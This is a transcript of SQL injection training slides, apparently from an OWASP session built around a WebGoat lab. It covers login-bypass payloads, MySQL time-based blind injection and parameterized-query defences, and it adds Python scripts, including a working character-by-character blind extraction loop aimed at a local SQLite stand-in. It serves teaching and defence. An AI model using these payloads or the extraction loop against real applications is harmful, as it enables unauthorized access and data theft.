8. Agenda
• Business risk of SQL Injection
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
9. Fundamental Problem
• User controlled data improperly used with SQL statements
• Example Vulnerable Query (pseudocode: the username and password typed by the user are concatenated straight into the SQL text):
    sqlQ = "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
• [Login form: Username ___ / Password ___; a user asks "My username is o'malley?"]
10. Fundamental Problem
• User controlled data improperly used with SQL statements
• o'malley scenario (username o'malley, password foo)
    Select user from UserTable where name='o'malley' and pass='foo'
• Result: the apostrophe in the name closes the string literal early, so the statement is no longer valid SQL
    Error: Invalid syntax
• This is the same root cause as an attack: user data was interpreted as part of the SQL statement
11. Agenda
• Business risk of SQL Injection
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
12. SQL Attack Examples
• Basic SQL Injection Tests (typed into the password field):
    OR 1=1 --
    ' OR '1'='1'--
• Select user from UserTable where name='joe' and pass='' OR '1'='1'--'
• Looks for username of joe and password of (blank || TRUE). AND binds tighter than OR, so the WHERE clause becomes (name='joe' AND pass='') OR TRUE, which is true for every row; the -- comments out the application's own trailing quote
13. Variations
• SQL Injection
• Error message or different text returned based on SQL statement results
• Example: error message or database data displayed in the page
• Blind SQL Injection
• No visible response to the user indicating success or failure of the query
14. Blind SQL Injection
• Use the response time to deduce a boolean
• Injected SQL uses IF statements and delays to enumerate data, 1 char at a time
• The examples below use MySQL BENCHMARK() to burn CPU; newer MySQL versions also offer SLEEP(seconds), which gives a more predictable delay
15. Blind SQL Examples
mysql> select * from example;
+----+-----------------+------+
| id | name            | age  |
+----+-----------------+------+
|  1 | Timmy Mellowman |   23 |
|  2 | Sandy Smith     |   21 |
+----+-----------------+------+
2 rows in set (0.00 sec)
16. Blind SQL Examples
• mysql> SELECT IF(name = 'Sandy Smith', BENCHMARK(1000000, MD5('x')), NULL) FROM example;
• Command line result - 2 rows in set (5.25 sec)
• mysql> SELECT IF(name = 'Joe Bob', BENCHMARK(1000000, MD5('x')), NULL) FROM example;
• Command line result - 2 rows in set (0.00 sec)
• The actual data returned is not important; the delay indicates True or False. BENCHMARK() only runs for rows where the IF condition holds, so a row named Sandy Smith costs ~5 s and a name that matches no row costs nothing
17. Blind SQL Injection
• mysql> select headerName from header_store UNION select IF(SUBSTRING(name, 1, 1)='T', BENCHMARK(1000000, MD5('x')), 'y') from example where age=23 limit 1;
• 1 row in set (6.01 sec)
• Tests whether the first character of "name" from the example table (where age=23) is the letter T. The UNION must return the same number of columns as the original query, and 'y' keeps the false branch a string like headerName; an attacker repeats this query with a new position and guess until the whole value is recovered
    +----+-----------------+------+
    |  1 | Timmy Mellowman |   23 |
    +----+-----------------+------+
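The following is an added example, not code from the slides or from WebGoat: it wraps the single-character test above in the loop an attacker actually runs, for both blind variants on slide 13 (time-based, as on slides 14-17, and boolean-based on page content). It uses Python with an in-memory SQLite stand-in for the MySQL tables; because SQLite has no BENCHMARK() or SLEEP(), a Python sleep function is registered under the name SLEEP. The `header_store` endpoint, the `X-Frame-Options` row, the delay value and the guess alphabet are constructed for the example.

```python
import sqlite3
import time

# Seconds the injected SLEEP() pauses on a TRUE answer (constructed value; the slides'
# BENCHMARK(1000000, MD5('x')) took roughly 5-6 s on the speaker's machine).
DELAY = 0.15

# Guess alphabet for one character at a time. The quote character is left out on
# purpose so that a guessed character can never break the injected query itself.
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ "


def build_db():
    """Constructed in-memory SQLite stand-in for the MySQL 'example' and
    'header_store' tables on the slides. SQLite has no BENCHMARK()/SLEEP(), so a
    Python function is registered under the name SLEEP to emulate the MySQL delay."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE example (id INTEGER, name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO example VALUES (?, ?, ?)",
                     [(1, "Timmy Mellowman", 23), (2, "Sandy Smith", 21)])
    conn.execute("CREATE TABLE header_store (id INTEGER, headerName TEXT)")
    conn.execute("INSERT INTO header_store VALUES (1, 'X-Frame-Options')")
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    return conn


def lookup_header(conn, header_id):
    """Hypothetical vulnerable endpoint: header_id is concatenated into the SQL.
    Nothing it selects is shown to the user, so only side channels can leak data."""
    sql = "SELECT headerName FROM header_store WHERE id = " + header_id
    return conn.execute(sql).fetchall()


def time_oracle(conn, condition):
    """Time-based blind oracle (slides 14-17): the UNIONed SELECT calls SLEEP() only
    when `condition` holds for the age=23 row, so the elapsed time is the yes/no answer."""
    payload = (f"1 UNION SELECT CASE WHEN {condition} THEN SLEEP({DELAY}) ELSE 0 END "
               f"FROM example WHERE age = 23")
    start = time.perf_counter()
    lookup_header(conn, payload)
    return time.perf_counter() - start >= DELAY / 2


def content_oracle(conn, condition):
    """Boolean-based blind oracle (slide 13): the page only reveals whether a header
    row was found, and the injected AND EXISTS(...) ties that outcome to `condition`."""
    payload = f"1 AND EXISTS(SELECT 1 FROM example WHERE age = 23 AND {condition})"
    return len(lookup_header(conn, payload)) > 0


def extract_name(conn, oracle, max_len=32):
    """Recover example.name for the age=23 row one character at a time: the loop an
    attacker wraps around the slide's single SUBSTRING(name, 1, 1) = 'T' test."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            # SQLite compares TEXT with BINARY collation (case-sensitive); MySQL's default
            # collation is case-insensitive, so there 'T' and 't' would both answer yes.
            if oracle(conn, f"SUBSTR(name, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no character matched: we have read past the end of the string
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("via timing:      ", extract_name(db, time_oracle))
    print("via page content:", extract_name(db, content_oracle))
```

The equality guess per character mirrors the slide; a real tool would usually binary-search the character code with `>` comparisons to cut the number of requests, and would calibrate the delay threshold against the normal response time so network jitter is not mistaken for a TRUE answer.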
18. WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
20. Using A Proxy
• Burp - Configure to listen on 8080
• Ensure “loopback only” is checked (will be by default)
21. Set Firefox Proxy
• Set Firefox proxy to 8080
• Preferences -> Advanced -> Network -> Settings
• Set HTTP Proxy to localhost, port 8080
• Important - clear the "No Proxy for" line, otherwise requests to localhost bypass the proxy
22. Confirm Setup Works
• Refresh Web Browser - it should hang
• Go to Burp -> Proxy -> Intercept (both tabs are highlighted while a request is being held)
• Click “Forward” for all messages
• Should now see page in browser
23. Confirm Setup Works
• Intercept is on
• Each request will be caught by proxy
• Requires you to hit forward each time
• Intercept is off
• Requests sent through proxy automatically
• Logged in tab “proxy”->”history”
24. “Hello World” of Proxies
• Lesson: General -> HTTP Basics
• Objective:
• Enter your name into the text box
• Intercept the request with the proxy and change the entered name to a different value
• Receive the response and observe that the modified value is what comes back reversed
• [Diagram: Browser sends "Joe" -> attacker's web proxy changes it to "Sue" -> web server reverses it -> "euS" is returned through the proxy to the browser]
25. SQL Injection
• Problem: User controlled data improperly used with SQL
statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests:
    OR 1=1 --
    ' OR '1'='1'--
• Example Vulnerable Query:
    sqlQ = "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
27. SQL Injection
• Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting "control" characters. Login as "Neville" without knowledge of the password
28. SQL Injection
• HTTP Post (edited in the proxy; the password field is where the injection goes)
    employee_id=112&password=x' OR '1'='1&action=Login
• Vulnerable SQL
    Select user from UserTable where name='" + username + "' and pass='" + password + "'
    Select user from UserTable where name='112' and pass='x' OR '1'='1'
• Result: ... name='112' and pass='x' OR TRUE
• Note the payload ends without a closing quote: the application's own trailing quote completes the injected '1' literal, so no -- comment is needed
29. Agenda
• Business risk of SQL Injection
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
30. SQL Injection
• Parameterized Queries
    No confusion between data and control characters: the SQL text is fixed and the values are bound separately
• Input Validation
    Are special characters needed for most fields? Allow-list what each field may contain
    What about non-printable characters %00-%0A?
    Just a layer of defense - remember the o'malley example: a filter that rejects apostrophes also rejects legitimate names, and it does nothing for fields that must accept them
31. Parameterized Query
• HTTP Post
    employee_id=112&password=x' OR '1'='1&action=Login
• Parameterized Query
    Looks for employee_id 112 with the literal password x' OR '1'='1
• Result: Login fails - the stored password is foo, not x' OR '1'='1
32. Language Examples
• User data + string concatenation == SQL injection disaster
• DJANGO
• Model Query API -> Safe (the ORM binds values as parameters)
• raw() manager / cursor.execute() with SQL built by string formatting -> Dangerous, avoid! If raw SQL is unavoidable, pass user values through the params argument, never format them into the SQL string
• Java
    // The ? is a placeholder in fixed SQL text; custname is bound as a value by setString,
    // so a quote inside it is data, not a control character
    String query = "SELECT account_balance FROM user_data WHERE user_name = ?";
    PreparedStatement pstmt = connection.prepareStatement(query);
    pstmt.setString(1, custname);
    ResultSet results = pstmt.executeQuery();
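As an added example (not code from the slides, WebGoat or Django), the vulnerable concatenated query from slides 9-12 and 28 is run side by side with the parameterized version from slides 30-32, in Python over an in-memory SQLite stand-in for the lab's UserTable. The table contents, the passwords and the `valid_employee_id` allow-list check are constructed for the example; the inputs are the ones on the slides.

```python
import sqlite3


def build_db():
    """Constructed in-memory SQLite stand-in for the slides' UserTable (the lab's
    real schema and passwords are not on the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO UserTable VALUES (?, ?)",
                     [("112", "s3cret-112"), ("joe", "s3cret-joe"), ("o'malley", "foo")])
    return conn


def login_concat(conn, username, password):
    """Vulnerable: the slides' concatenated query. Returns the matched name, None when
    no row matches, and raises sqlite3.OperationalError when the input breaks the SQL."""
    sql = ("SELECT name FROM UserTable WHERE name='" + username +
           "' AND pass='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn, username, password):
    """Fixed: a parameterized query. The SQL text is fixed and the values travel
    separately, so a quote in the input is data, never a control character."""
    row = conn.execute("SELECT name FROM UserTable WHERE name=? AND pass=?",
                       (username, password)).fetchone()
    return row[0] if row else None


def valid_employee_id(value):
    """Slide 30's input-validation layer for a field that never needs special
    characters: an allow-list used in addition to placeholders, not instead of them."""
    return value.isdigit()


def demo():
    """Run the slides' inputs through both versions and collect what each returns."""
    db = build_db()
    out = {}

    # Slide 10: a legitimate apostrophe. Concatenation yields
    #   ... name='o'malley' AND pass='foo'   -> the database rejects the statement.
    try:
        login_concat(db, "o'malley", "foo")
        out["concat_omalley"] = "ok"
    except sqlite3.OperationalError:
        out["concat_omalley"] = "syntax error"
    out["param_omalley"] = login_param(db, "o'malley", "foo")

    # Slide 28: password x' OR '1'='1 with a username that does not exist. The
    # application's own closing quote completes the injected '1' literal, giving
    #   ... name='nobody' AND pass='x' OR '1'='1'   -> true for every row.
    out["concat_bypass"] = login_concat(db, "nobody", "x' OR '1'='1")
    out["param_bypass"] = login_param(db, "nobody", "x' OR '1'='1")

    # Slide 12: the -- variant comments out the trailing quote instead.
    out["concat_comment"] = login_concat(db, "joe", "' OR '1'='1'--")
    out["param_comment"] = login_param(db, "joe", "' OR '1'='1'--")

    # Defense in depth: the id field can be allow-listed, the name field cannot.
    out["id_check"] = (valid_employee_id("112"), valid_employee_id("x' OR '1'='1"))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} -> {value!r}")
```

With concatenation the bypass payloads return the first row in the table regardless of the username supplied, which is exactly how "login as Neville without the password" works in the lab; the parameterized version returns no row for them and, unlike the concatenated one, logs o'malley in correctly.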
34. Questions
• Next Events
• Aug 24 - CEF Logging for Attack Aware Applications
• Aug 25 - OWASP Bay Area Chapter Meeting
• https://wiki.mozilla.org/index.php?title=WebAppSec#Schedule